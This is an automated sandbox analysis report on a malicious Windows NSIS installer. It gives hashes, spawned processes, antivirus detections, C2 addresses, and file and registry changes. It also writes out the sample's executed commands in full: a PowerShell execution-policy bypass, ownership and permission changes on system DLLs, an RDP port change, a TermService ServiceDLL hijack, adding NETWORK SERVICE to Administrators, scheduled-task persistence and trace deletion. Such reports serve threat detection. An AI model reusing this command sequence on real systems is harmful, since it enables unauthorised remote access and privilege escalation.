paladin316

Exes_d2a062ca772fa3ace7c7edadbd95eaf7_exe_2019-07-16_07_30.txt

  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe"
  7. * File Size: 3038197
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
  9. * SHA256: "286c980e3caf90286482d6af0de30e4865599f5d8241957344f92b97b6fb88d6"
  10. * MD5: "d2a062ca772fa3ace7c7edadbd95eaf7"
  11. * SHA1: "dc13b73487e153711a3955a2ce6678881b3ffc7c"
  12. * SHA512: "73cd04708c5db5b96622370f756dbed08a0a9dadee739e389d4a9c7fe0f8b146afd4201f738913126e5a220345ac5842f59bcba6e7a9e320d22975701b63016c"
  13. * CRC32: "41ECBD26"
  14. * SSDEEP: "49152:94GyKQCCrxxMN7QyaZD6caRSDDqjdeLqybDTefAJR2hcSDrd6V83JY:9zICIMN7QycaRSDDqoLbDwrhcOQi5Y"
  15.  
  16. * Process Execution:
  17. "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
  18. "cmd.exe",
  19. "powershell.exe",
  20. "takeown.exe",
  21. "icacls.exe",
  22. "icacls.exe",
  23. "icacls.exe",
  24. "icacls.exe",
  25. "icacls.exe",
  26. "icacls.exe",
  27. "icacls.exe",
  28. "reg.exe",
  29. "reg.exe",
  30. "net.exe",
  31. "net1.exe",
  32. "cmd.exe",
  33. "cmd.exe",
  34. "services.exe",
  35. "svchost.exe",
  36. "WmiPrvSE.exe",
  37. "WmiPrvSE.exe",
  38. "svchost.exe",
  39. "cmd.exe",
  40. "rundll32.exe",
  41. "svchost.exe",
  42. "taskhost.exe",
  43. "svchost.exe",
  44. "taskhost.exe",
  45. "svchost.exe",
  46. "WerFault.exe",
  47. "wermgr.exe",
  48. "rundll32.exe",
  49. "cmd.exe",
  50. "rundll32.exe",
  51. "cmd.exe",
  52. "updsvc.exe",
  53. "cmd.exe",
  54. "schtasks.exe",
  55. "svchost.exe",
  56. "taskeng.exe",
  57. "WerFault.exe",
  58. "lsm.exe"
  59.  
  60.  
  61. * Executed Commands:
  62. "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  63. "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  64. "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
  65. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
  66. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
  67. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
  68. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
  69. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
  70. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
  71. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
  72. "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
  73. "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\hlp11.dat /f",
  74. "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  75. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
  76. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
  77. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  78. "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  79. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  80. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  81. "taskhost.exe $(Arg0)",
  82. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  83. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  84. "cmd.exe /c rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  85. "C:\\Windows\\system32\\WerFault.exe -u -p 2632 -s 288",
  86. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\"",
  87. "rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  88. "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  89. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  90. "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
  91. "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  92. "c:\\windows\\temp\\updsvc.exe",
  93. "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  94. "\"c:\\windows\\temp\\GetUserLang.exe\"",
  95. "taskeng.exe 1C9308F0-8A41-4006-B814-D2F5B13BEDB5 S-1-5-18:NT AUTHORITY\\System:Service:",
  96. "taskeng.exe 8D661787-E909-433D-BDE3-477DCB39306A S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  97. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  98.  
  99.  
  100. * Signatures Detected:
  101.  
  102. "Description": "At least one process apparently crashed during execution",
  103. "Details":
  104.  
  105.  
  106. "Description": "Creates RWX memory",
  107. "Details":
  108.  
  109.  
  110. "Description": "Possible date expiration check, exits too soon after checking local time",
  111. "Details":
  112.  
  113. "process": "cmd.exe, PID 980"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Attempts to connect to a dead IP:Port (5 unique times)",
  119. "Details":
  120.  
  121. "IP": "185.225.17.169:443"
  122.  
  123.  
  124. "IP": "8.250.93.254:80"
  125.  
  126.  
  127. "IP": "185.225.17.169:80"
  128.  
  129.  
  130. "IP": "185.225.17.66:443"
  131.  
  132.  
  133. "IP": "192.35.177.64:80"
  134.  
  135.  
  136.  
  137.  
  138. "Description": "Loads a driver",
  139. "Details":
  140.  
  141. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  142.  
  143.  
  144.  
  145.  
  146. "Description": "Expresses interest in specific running processes",
  147. "Details":
  148.  
  149. "process": "rundll32.exe"
  150.  
  151.  
  152. "process": "winlogon.exe"
  153.  
  154.  
  155. "process": "explorer.exe"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Reads data out of its own binary image",
  161. "Details":
  162.  
  163. "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00000000, length: 0x002e5bf1"
  164.  
  165.  
  166. "self_read": "process: Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe, pid: 1500, offset: 0x00008c1c, length: 0x002dcfd9"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "A process created a hidden window",
  172. "Details":
  173.  
  174. "Process": "Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe -> \"C:\\Windows\\system32\\cmd.exe\""
  175.  
  176.  
  177. "Process": "rundll32.exe -> cmd.exe"
  178.  
  179.  
  180. "Process": "rundll32.exe -> cmd.exe"
  181.  
  182.  
  183.  
  184.  
  185. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  186. "Details":
  187.  
  188. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  189.  
  190.  
  191. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  192.  
  193.  
  194. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  195.  
  196.  
  197. "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  198.  
  199.  
  200. "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
  201.  
  202.  
  203.  
  204.  
  205. "Description": "Performs some HTTP requests",
  206. "Details":
  207.  
  208. "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  209.  
  210.  
  211. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  212.  
  213.  
  214. "url": "http://letitbe.icu/2.txt"
  215.  
  216.  
  217. "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  218.  
  219.  
  220. "url": "http://geo.netsupportsoftware.com/location/loca.asp"
  221.  
  222.  
  223.  
  224.  
  225. "Description": "Deletes its original binary from disk",
  226. "Details":
  227.  
  228.  
  229. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  230. "Details":
  231.  
  232. "Process": "svchost.exe (1760)"
  233.  
  234.  
  235.  
  236.  
  237. "Description": "Attempts to stop active services",
  238. "Details":
  239.  
  240. "servicename": "UmRdpService"
  241.  
  242.  
  243.  
  244.  
  245. "Description": "A process attempted to delay the analysis task for a long period of time.",
  246. "Details":
  247.  
  248. "Process": "lsm.exe tried to sleep 435 seconds, actually delayed analysis time by 0 seconds"
  249.  
  250.  
  251. "Process": "powershell.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  252.  
  253.  
  254. "Process": "updsvc.exe tried to sleep 356 seconds, actually delayed analysis time by 0 seconds"
  255.  
  256.  
  257. "Process": "WmiPrvSE.exe tried to sleep 900 seconds, actually delayed analysis time by 0 seconds"
  258.  
  259.  
  260. "Process": "svchost.exe tried to sleep 4985 seconds, actually delayed analysis time by 0 seconds"
  261.  
  262.  
  263.  
  264.  
  265. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  266. "Details":
  267.  
  268. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10986021 times"
  269.  
  270.  
  271.  
  272.  
  273. "Description": "Attempts to execute a Living Off The Land Binary command for post exploitation",
  274. "Details":
  275.  
  276. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  277.  
  278.  
  279.  
  280.  
  281. "Description": "Installs itself for autorun at Windows startup",
  282. "Details":
  283.  
  284. "service name": "RunAsSystem1224"
  285.  
  286.  
  287. "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  288.  
  289.  
  290. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath"
  291.  
  292.  
  293. "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  294.  
  295.  
  296. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
  297.  
  298.  
  299. "data": "%SystemRoot%\\help\\hlp11.dat"
  300.  
  301.  
  302. "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  303.  
  304.  
  305.  
  306.  
  307. "Description": "Creates a hidden or system file",
  308. "Details":
  309.  
  310. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP"
  311.  
  312.  
  313. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
  314.  
  315.  
  316. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
  317.  
  318.  
  319. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
  320.  
  321.  
  322. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
  323.  
  324.  
  325. "file": "C:\\Windows\\Temp\\client32.exe"
  326.  
  327.  
  328. "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
  329.  
  330.  
  331. "file": "C:\\Windows\\Temp\\msvcr100.dll"
  332.  
  333.  
  334. "file": "C:\\Windows\\Temp\\nskbfltr.inf"
  335.  
  336.  
  337. "file": "C:\\Windows\\Temp\\NSM.ini"
  338.  
  339.  
  340. "file": "C:\\Windows\\Temp\\NSM.LIC"
  341.  
  342.  
  343. "file": "C:\\Windows\\Temp\\pcicapi.dll"
  344.  
  345.  
  346. "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
  347.  
  348.  
  349. "file": "C:\\Windows\\Temp\\PCICL32.DLL"
  350.  
  351.  
  352. "file": "C:\\Windows\\Temp\\remcmdstub.exe"
  353.  
  354.  
  355. "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
  356.  
  357.  
  358.  
  359.  
  360. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  361. "Details":
  362.  
  363. "Bkav": "HW32.Packed."
  364.  
  365.  
  366. "FireEye": "Generic.mg.d2a062ca772fa3ac"
  367.  
  368.  
  369. "Qihoo-360": "HEUR/QVM20.1.8D73.Malware.Gen"
  370.  
  371.  
  372. "McAfee": "Artemis!D2A062CA772F"
  373.  
  374.  
  375. "Cylance": "Unsafe"
  376.  
  377.  
  378. "Alibaba": "Trojan:Win32/Scrami.8a399acb"
  379.  
  380.  
  381. "Symantec": "ML.Attribute.HighConfidence"
  382.  
  383.  
  384. "APEX": "Malicious"
  385.  
  386.  
  387. "Paloalto": "generic.ml"
  388.  
  389.  
  390. "Kaspersky": "HEUR:Trojan.Win32.Scrami.gen"
  391.  
  392.  
  393. "Avast": "Win32:Malware-gen"
  394.  
  395.  
  396. "DrWeb": "Trojan.MulDrop9.28262"
  397.  
  398.  
  399. "Invincea": "heuristic"
  400.  
  401.  
  402. "McAfee-GW-Edition": "BehavesLike.Win32.PUPXCI.vc"
  403.  
  404.  
  405. "Trapmine": "malicious.moderate.ml.score"
  406.  
  407.  
  408. "SentinelOne": "DFI - Malicious PE"
  409.  
  410.  
  411. "Microsoft": "Trojan:Win32/Zpevdo.A"
  412.  
  413.  
  414. "Endgame": "malicious (high confidence)"
  415.  
  416.  
  417. "AegisLab": "Trojan.Win32.Scrami.4!c"
  418.  
  419.  
  420. "ZoneAlarm": "HEUR:Trojan.Win32.Scrami.gen"
  421.  
  422.  
  423. "Acronis": "suspicious"
  424.  
  425.  
  426. "AVG": "Win32:Malware-gen"
  427.  
  428.  
  429. "Cybereason": "malicious.487e15"
  430.  
  431.  
  432. "CrowdStrike": "win/malicious_confidence_100% (D)"
  433.  
  434.  
  435.  
  436.  
  437. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  438. "Details":
  439.  
  440.  
  441. "Description": "Attempts to create or modify system certificates",
  442. "Details":
  443.  
  444.  
  445. "Description": "Created network traffic indicative of malicious activity",
  446. "Details":
  447.  
  448. "signature": "ET DNS Query to a *.pw domain - Likely Hostile"
  449.  
  450.  
  451.  
  452.  
  453.  
  454. * Started Service:
  455. "TermService",
  456. "WerSvc",
  457. "UmRdpService",
  458. "RunAsSystem1224"
  459.  
  460.  
  461. * Mutexes:
  462. "Global\\CLR_CASOFF_MUTEX",
  463. "TSLicensingLock",
  464. "CicLoadWinStaWinSta0",
  465. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  466. "Local\\WERReportingForProcess2632",
  467. "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  468. "Global\\\\xed\\x95\\xb0\\xc7\\x8f",
  469. "WERUI_BEX64-d9cea5d53964d256a96f47a4e221d2152335d"
  470.  
  471.  
  472. * Modified Files:
  473. "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  474. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  475. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
  476. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  477. "\\??\\PIPE\\srvsvc",
  478. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\170M8EJSQ3YRP9VT3GBJ.temp",
  479. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
  480. "C:\\Windows\\Help\\hlp11.dat",
  481. "C:\\Windows\\Help\\hlp12.dat",
  482. "C:\\Windows\\Help\\hlp13.dat",
  483. "C:\\Windows\\sysnative\\rfxvmt.dll",
  484. "C:\\Windows\\Temp\\desk.txt",
  485. "C:\\Windows\\inf\\setupapi.dev.log",
  486. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  487. "\\??\\PIPE\\samr",
  488. "\\??\\PIPE\\lsarpc",
  489. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  490. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  491. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7c74d58e-3ad2-4500-acb9-a97c9d5ed2aa",
  492. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\mod.txt",
  493. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\dawerwer3434asdf3.dat",
  494. "C:\\Windows\\Help\\35279.ps1",
  495. "\\Device\\Termdd",
  496. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
  497. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  498. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  499. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
  500. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
  501. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
  502. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
  503. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
  504. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
  505. "C:\\Windows\\Temp\\client32.exe",
  506. "C:\\Windows\\Temp\\client32.ini",
  507. "C:\\Windows\\Temp\\HTCTL32.DLL",
  508. "C:\\Windows\\Temp\\msvcr100.dll",
  509. "C:\\Windows\\Temp\\nskbfltr.inf",
  510. "C:\\Windows\\Temp\\NSM.ini",
  511. "C:\\Windows\\Temp\\NSM.LIC",
  512. "C:\\Windows\\Temp\\pcicapi.dll",
  513. "C:\\Windows\\Temp\\PCICHEK.DLL",
  514. "C:\\Windows\\Temp\\PCICL32.DLL",
  515. "C:\\Windows\\Temp\\remcmdstub.exe",
  516. "C:\\Windows\\Temp\\TCCTL32.DLL",
  517. "C:\\Windows\\Temp\\cksini.exe",
  518. "C:\\Windows\\Temp\\updsvc.exe",
  519. "\\Device\\RdpDr",
  520. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  521. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
  522. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
  523. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
  524. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
  525. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERA4CE.tmp.appcompat.txt",
  526. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA1E.tmp.WERInternalMetadata.xml",
  527. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERAA7D.tmp.hdmp",
  528. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\WERB943.tmp.mdmp",
  529. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer",
  530. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
  531. "C:\\Windows\\Temp\\mod.txt",
  532. "C:\\Users\\user\\AppData\\Local\\Temp\\mod.txt",
  533. "C:\\Windows\\sysnative\\Tasks\\updsvc",
  534. "\\Device\\LanmanDatagramReceiver",
  535. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  536. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  537. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf"
  538.  
  539.  
  540. * Deleted Files:
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\nsgA7A6.tmp",
  542. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp",
  543. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\System.dll",
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\nsxA9DA.tmp\\",
  545. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF160e5ac.TMP",
  546. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  547. "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
  548. "C:\\Users\\user\\AppData\\Local\\Temp\\shipkat.ps1",
  549. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d2a062ca772fa3ace7c7edadbd95eaf7.exe",
  550. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1572.23127796",
  551. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1572.23127796",
  552. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1572.23127796",
  553. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab8E67.tmp",
  554. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar8E78.tmp",
  555. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep933.bin",
  556. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep898.zip",
  557. "C:\\Windows\\Temp\\client32.exe",
  558. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp",
  559. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA4CE.tmp.appcompat.txt",
  560. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp",
  561. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA1E.tmp.WERInternalMetadata.xml",
  562. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp",
  563. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA7D.tmp.hdmp",
  564. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp",
  565. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB943.tmp.mdmp",
  566. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d9cea5d53964d256a96f47a4e221d2152335d_cab_091a14dd\\Report.wer.tmp",
  567. "C:\\Windows\\Tasks\\updsvc.job",
  568. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  569.  
  570.  
  571. * Modified Registry Keys:
  572. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  573. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  574. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  575. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  576. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  577. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  578. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  579. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  580. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  581. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  582. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  583. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  584. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
  585. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
  586. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  587. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  588. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224",
  589. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Type",
  590. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Start",
  591. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ErrorControl",
  592. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath",
  593. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DisplayName",
  594. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ObjectName",
  595. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DeleteFlag",
  596. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  597. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
  598. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
  599. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  600. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
